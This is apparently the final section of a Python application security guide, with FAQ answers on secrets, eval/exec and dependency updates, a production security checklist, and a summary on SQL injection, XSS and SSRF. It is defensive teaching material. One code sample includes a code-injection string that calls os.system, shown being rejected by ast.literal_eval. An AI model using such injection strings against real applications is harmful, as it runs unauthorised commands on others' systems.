Never hardcode secrets. Use environment variables for simple cases, or secret management services (AWS Secrets Manager, HashiCorp Vault) for production. Load secrets once at startup, not on every request.
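A minimal sketch of the load-once, fail-fast pattern for environment-variable secrets (the Settings class and variable names like DATABASE_URL are placeholders):

```python
import os

class Settings:
    """Load secrets once at startup; crash early if one is missing."""

    def __init__(self):
        self.database_url = self._require("DATABASE_URL")
        self.api_key = self._require("API_KEY")

    @staticmethod
    def _require(name: str) -> str:
        # Fail at boot rather than mid-request with a confusing error
        value = os.environ.get(name)
        if not value:
            raise RuntimeError(f"Missing required secret: {name}")
        return value

# Instantiate once at application startup, not per request:
# settings = Settings()
```

The same shape works when the values come from a secret manager instead of the environment; only the _require body changes.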
Is it safe to use eval() or exec() with user input?
Never. There’s no safe way to use eval() or exec() with untrusted input. If you need dynamic code execution, use a sandboxed environment or switch to a configuration-driven approach instead.
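When the “dynamic” input is really just data, ast.literal_eval (or json.loads) covers most legitimate uses of eval() without the code-execution risk. A minimal sketch:

```python
import ast

# eval() on this string would import os and run code;
# literal_eval only accepts Python literals (numbers, strings,
# tuples, lists, dicts, sets, booleans, None)
config = ast.literal_eval("{'retries': 3, 'hosts': ['a', 'b']}")
assert config == {"retries": 3, "hosts": ["a", "b"]}

# Anything that is not a literal raises instead of executing
try:
    ast.literal_eval("__import__('os').system('id')")
except (ValueError, SyntaxError):
    print("rejected non-literal input")
```

If the input is configuration, prefer JSON, TOML, or YAML (via yaml.safe_load) over Python syntax entirely.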
How often should I update dependencies for security?
Monitor for security updates continuously and apply them quickly. Use tools like Dependabot or Renovate to automate security updates. For major version updates, test thoroughly but don’t delay security patches.
Production Security Checklist
Before deploying your Python application:
Application Level
- All database queries use parameterized statements
- Template auto-escaping is enabled and tested
- User input validation uses allowlists, not denylists
- SSRF protection validates all outbound requests
- File uploads are restricted and stored safely
- Error messages don’t leak sensitive information
- Logging captures security events but not secrets
- Sessions use secure, httpOnly cookies
Infrastructure Level
- HTTPS enforced with HSTS headers
- Content Security Policy implemented
- CORS configured restrictively
- Rate limiting protects against brute force
- Web server configured securely (no server tokens, etc.)
- Firewall blocks internal network access from web tier
- Cloud metadata services blocked or secured
Development Process
- Static analysis tools integrated in CI
- Dependency scanning automated
- Security testing included in test suite
- Secrets never committed to version control
- Regular security training for developers
- Incident response plan documented
The Bottom Line
Most Python security vulnerabilities come down to trusting user input too much. SQL injection happens when you trust input in database queries. XSS happens when you trust input in HTML output. SSRF happens when you trust input in URL requests.
The pattern is always the same: validate input strictly, use framework protections, and test with malicious data.
Security isn’t something you add at the end - it’s a mindset you bring to every line of code you write. Start with these three vulnerabilities, master them completely, and you’ll prevent the vast majority of attacks your application will face.
See also:
- Python SSRF Prevention: Complete Developer Guide — comprehensive SSRF protection for Python frameworks
- Getting Started with Python Requests — secure HTTP client patterns and session handling
- Content Security Policy Guide — browser-based XSS defense strategies
- Common Weakness Enumeration (CWE) — vulnerability classification for SSRF, SQL injection, and XSS